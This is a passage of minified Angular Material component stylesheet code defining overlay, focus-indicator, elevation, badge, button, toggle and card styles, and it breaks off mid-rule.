.cdk-global-overlay-wrapper[_ngcontent-%COMP%]{pointer-events:none;top:0;left:0;height:100%;width:100%}.cdk-overlay-container[_ngcontent-%COMP%]{position:fixed;z-index:1000}.cdk-overlay-container[_ngcontent-%COMP%]:empty{display:none}.cdk-global-overlay-wrapper[_ngcontent-%COMP%]{display:flex;position:absolute;z-index:1000}.cdk-overlay-pane[_ngcontent-%COMP%]{position:absolute;pointer-events:auto;box-sizing:border-box;z-index:1000;display:flex;max-width:100%;max-height:100%}.cdk-overlay-backdrop[_ngcontent-%COMP%]{position:absolute;inset:0;z-index:1000;pointer-events:auto;-webkit-tap-highlight-color:transparent;transition:opacity .4s cubic-bezier(.25,.8,.25,1);opacity:0}.cdk-overlay-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:1}.cdk-high-contrast-active[_ngcontent-%COMP%]   .cdk-overlay-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:.6}.cdk-overlay-dark-backdrop[_ngcontent-%COMP%]{background:rgba(0,0,0,.32)}.cdk-overlay-transparent-backdrop[_ngcontent-%COMP%]{transition:visibility 1ms linear,opacity 1ms linear;visibility:hidden;opacity:1}.cdk-overlay-transparent-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:0;visibility:visible}.cdk-overlay-backdrop-noop-animation[_ngcontent-%COMP%]{transition:none}.cdk-overlay-connected-position-bounding-box[_ngcontent-%COMP%]{position:absolute;z-index:1000;display:flex;flex-direction:column;min-width:1px;min-height:1px}.cdk-global-scrollblock[_ngcontent-%COMP%]{position:fixed;width:100%;overflow-y:scroll}textarea.cdk-textarea-autosize[_ngcontent-%COMP%]{resize:none}textarea.cdk-textarea-autosize-measuring[_ngcontent-%COMP%]{padding:2px 0!important;box-sizing:content-box!important;height:auto!important;overflow:hidden!important}textarea.cdk-textarea-autosize-measuring-firefox[_ngcontent-%COMP%]{padding:2px 0!important;box-sizing:content-box!important;height:0!important}@keyframes cdk-text-field-autofill-start{}@keyframes cdk-text-field-autofill-end{}.cdk-text-field-autofill-monitored[_ngcontent-%COMP%]:-webkit-autofill{animation:cdk-text-field-autofill-start 0s 1ms}.cdk-text-field-autofill-monitored[_ngcontent-%COMP%]:not(:-webkit-autofill){animation:cdk-text-field-autofill-end 0s 1ms}.mat-focus-indicator[_ngcontent-%COMP%]{position:relative}.mat-focus-indicator[_ngcontent-%COMP%]:before{inset:0;position:absolute;box-sizing:border-box;pointer-events:none;display:var(--mat-focus-indicator-display, none);border:var(--mat-focus-indicator-border-width, 3px) var(--mat-focus-indicator-border-style, solid) var(--mat-focus-indicator-border-color, transparent);border-radius:var(--mat-focus-indicator-border-radius, 4px)}.mat-focus-indicator[_ngcontent-%COMP%]:focus:before{content:""}.cdk-high-contrast-active[_ngcontent-%COMP%]{--mat-focus-indicator-display: block}.mat-mdc-focus-indicator[_ngcontent-%COMP%]{position:relative}.mat-mdc-focus-indicator[_ngcontent-%COMP%]:before{inset:0;position:absolute;box-sizing:border-box;pointer-events:none;display:var(--mat-mdc-focus-indicator-display, none);border:var(--mat-mdc-focus-indicator-border-width, 3px) var(--mat-mdc-focus-indicator-border-style, solid) var(--mat-mdc-focus-indicator-border-color, transparent);border-radius:var(--mat-mdc-focus-indicator-border-radius, 4px)}.mat-mdc-focus-indicator[_ngcontent-%COMP%]:focus:before{content:""}.cdk-high-contrast-active[_ngcontent-%COMP%]{--mat-mdc-focus-indicator-display: block}.mat-ripple-element[_ngcontent-%COMP%]{background-color:#0000001a}.mat-option[_ngcontent-%COMP%]{color:#000000de}.mat-option[_ngcontent-%COMP%]:hover:not(.mat-option-disabled), .mat-option[_ngcontent-%COMP%]:focus:not(.mat-option-disabled){background:rgba(0,0,0,.04)}.mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple):not(.mat-option-disabled){background:rgba(0,0,0,.04)}.mat-option.mat-active[_ngcontent-%COMP%]{background:rgba(0,0,0,.04);color:#000000de}.mat-option.mat-option-disabled[_ngcontent-%COMP%]{color:#00000061}.mat-primary[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#2196f3}.mat-accent[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#7b1fa2}.mat-warn[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#f44336}.mat-optgroup-label[_ngcontent-%COMP%]{color:#0000008a}.mat-optgroup-disabled[_ngcontent-%COMP%]   .mat-optgroup-label[_ngcontent-%COMP%]{color:#00000061}.mat-pseudo-checkbox[_ngcontent-%COMP%]{color:#0000008a}.mat-pseudo-checkbox[_ngcontent-%COMP%]:after{color:#f5f5f5}.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{color:#b0b0b0}.mat-primary[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-primary[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#2196f3}.mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%], .mat-accent[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-accent[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#7b1fa2}.mat-warn[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-warn[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#f44336}.mat-pseudo-checkbox-checked.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%], .mat-pseudo-checkbox-indeterminate.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{background:#b0b0b0}.mat-app-background[_ngcontent-%COMP%]{background-color:#f5f5f5;color:#000000de}.mat-elevation-z0[_ngcontent-%COMP%]{box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-elevation-z1[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.mat-elevation-z2[_ngcontent-%COMP%]{box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-elevation-z3[_ngcontent-%COMP%]{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.mat-elevation-z4[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-elevation-z5[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 5px 8px #00000024,0 1px 14px #0000001f}.mat-elevation-z6[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-elevation-z7[_ngcontent-%COMP%]{box-shadow:0 4px 5px -2px #0003,0 7px 10px 1px #00000024,0 2px 16px 1px #0000001f}.mat-elevation-z8[_ngcontent-%COMP%]{box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.mat-elevation-z9[_ngcontent-%COMP%]{box-shadow:0 5px 6px -3px #0003,0 9px 12px 1px #00000024,0 3px 16px 2px #0000001f}.mat-elevation-z10[_ngcontent-%COMP%]{box-shadow:0 6px 6px -3px #0003,0 10px 14px 1px #00000024,0 4px 18px 3px #0000001f}.mat-elevation-z11[_ngcontent-%COMP%]{box-shadow:0 6px 7px -4px #0003,0 11px 15px 1px #00000024,0 4px 20px 3px #0000001f}.mat-elevation-z12[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.mat-elevation-z13[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 13px 19px 2px #00000024,0 5px 24px 4px #0000001f}.mat-elevation-z14[_ngcontent-%COMP%]{box-shadow:0 7px 9px -4px #0003,0 14px 21px 2px #00000024,0 5px 26px 4px #0000001f}.mat-elevation-z15[_ngcontent-%COMP%]{box-shadow:0 8px 9px -5px #0003,0 15px 22px 2px #00000024,0 6px 28px 5px #0000001f}.mat-elevation-z16[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.mat-elevation-z17[_ngcontent-%COMP%]{box-shadow:0 8px 11px -5px #0003,0 17px 26px 2px #00000024,0 6px 32px 5px #0000001f}.mat-elevation-z18[_ngcontent-%COMP%]{box-shadow:0 9px 11px -5px #0003,0 18px 28px 2px #00000024,0 7px 34px 6px #0000001f}.mat-elevation-z19[_ngcontent-%COMP%]{box-shadow:0 9px 12px -6px #0003,0 19px 29px 2px #00000024,0 7px 36px 6px #0000001f}.mat-elevation-z20[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 20px 31px 3px #00000024,0 8px 38px 7px #0000001f}.mat-elevation-z21[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 21px 33px 3px #00000024,0 8px 40px 7px #0000001f}.mat-elevation-z22[_ngcontent-%COMP%]{box-shadow:0 10px 14px -6px #0003,0 22px 35px 3px #00000024,0 8px 42px 7px #0000001f}.mat-elevation-z23[_ngcontent-%COMP%]{box-shadow:0 11px 14px -7px #0003,0 23px 36px 3px #00000024,0 9px 44px 8px #0000001f}.mat-elevation-z24[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-theme-loaded-marker[_ngcontent-%COMP%]{display:none}.mat-autocomplete-panel[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-autocomplete-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-autocomplete-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover){background:white}.mat-autocomplete-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover):not(.mat-option-disabled){color:#000000de}.mat-badge[_ngcontent-%COMP%]{position:relative}.mat-badge.mat-badge[_ngcontent-%COMP%]{overflow:visible}.mat-badge-hidden[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{display:none}.mat-badge-content[_ngcontent-%COMP%]{position:absolute;text-align:center;display:inline-block;border-radius:50%;transition:transform .2s ease-in-out;transform:scale(.6);overflow:hidden;white-space:nowrap;text-overflow:ellipsis;pointer-events:none}.ng-animate-disabled[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%], .mat-badge-content._mat-animation-noopable[_ngcontent-%COMP%]{transition:none}.mat-badge-content.mat-badge-active[_ngcontent-%COMP%]{transform:none}.mat-badge-small[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{width:16px;height:16px;line-height:16px}.mat-badge-small.mat-badge-above[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{top:-8px}.mat-badge-small.mat-badge-below[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{bottom:-8px}.mat-badge-small.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-16px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-small.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-16px}.mat-badge-small.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-16px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-small.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-16px}.mat-badge-small.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-8px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-small.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-8px}.mat-badge-small.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-8px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-small.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-8px}.mat-badge-medium[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{width:22px;height:22px;line-height:22px}.mat-badge-medium.mat-badge-above[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{top:-11px}.mat-badge-medium.mat-badge-below[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{bottom:-11px}.mat-badge-medium.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-22px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-medium.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-22px}.mat-badge-medium.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-22px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-medium.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-22px}.mat-badge-medium.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-11px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-medium.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-11px}.mat-badge-medium.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-11px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-medium.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-11px}.mat-badge-large[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{width:28px;height:28px;line-height:28px}.mat-badge-large.mat-badge-above[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{top:-14px}.mat-badge-large.mat-badge-below[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{bottom:-14px}.mat-badge-large.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-28px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-large.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-28px}.mat-badge-large.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-28px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-large.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-28px}.mat-badge-large.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-14px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-large.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-14px}.mat-badge-large.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-14px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-large.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-14px}.mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#2196f3}.cdk-high-contrast-active[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{outline:solid 1px;border-radius:0}.mat-badge-accent[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.mat-badge-warn[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#f44336}.mat-badge-disabled[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{background:#b5b5b5;color:#00000061}.mat-bottom-sheet-container[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f;background:white;color:#000000de}.mat-button[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%]{color:inherit;background:transparent}.mat-button.mat-primary[_ngcontent-%COMP%], .mat-icon-button.mat-primary[_ngcontent-%COMP%], .mat-stroked-button.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.mat-button.mat-accent[_ngcontent-%COMP%], .mat-icon-button.mat-accent[_ngcontent-%COMP%], .mat-stroked-button.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-button.mat-warn[_ngcontent-%COMP%], .mat-icon-button.mat-warn[_ngcontent-%COMP%], .mat-stroked-button.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#00000042}.mat-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#2196f3}.mat-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#f44336}.mat-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:transparent}.mat-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{opacity:.1;background-color:currentColor}.mat-button-focus-overlay[_ngcontent-%COMP%]{background:black}.mat-stroked-button[_ngcontent-%COMP%]:not(.mat-button-disabled){border-color:#0000001f}.mat-flat-button[_ngcontent-%COMP%], .mat-raised-button[_ngcontent-%COMP%], .mat-fab[_ngcontent-%COMP%], .mat-mini-fab[_ngcontent-%COMP%]{color:#000000de;background-color:#fff}.mat-flat-button.mat-primary[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%], .mat-flat-button.mat-accent[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%], .mat-flat-button.mat-warn[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{color:#fff}.mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#00000042}.mat-flat-button.mat-primary[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3}.mat-flat-button.mat-accent[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-flat-button.mat-warn[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{background-color:#0000001f}.mat-flat-button.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-flat-button.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-flat-button.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-stroked-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-flat-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-raised-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-raised-button[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.mat-raised-button.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-mini-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]), .mat-mini-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.mat-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-mini-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-button-toggle-standalone[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-button-toggle-group[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:none}.mat-button-toggle[_ngcontent-%COMP%]{color:#00000061}.mat-button-toggle[_ngcontent-%COMP%]   .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#0000001f}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#000000de;background:white}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#000}.mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:solid 1px #e0e0e0}[dir=rtl][_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px #e0e0e0}.mat-button-toggle-group-appearance-standard.mat-button-toggle-vertical[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:none;border-top:solid 1px #e0e0e0}.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#e0e0e0;color:#0000008a}.mat-button-toggle-checked.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#000000de}.mat-button-toggle-disabled[_ngcontent-%COMP%]{color:#00000042;background-color:#eee}.mat-button-toggle-disabled.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{background:white}.mat-button-toggle-disabled.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#bdbdbd}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%], .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]{border:solid 1px #e0e0e0}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle-label-content[_ngcontent-%COMP%]{line-height:48px}.mat-card[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-card[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.mat-card.mat-card-flat[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 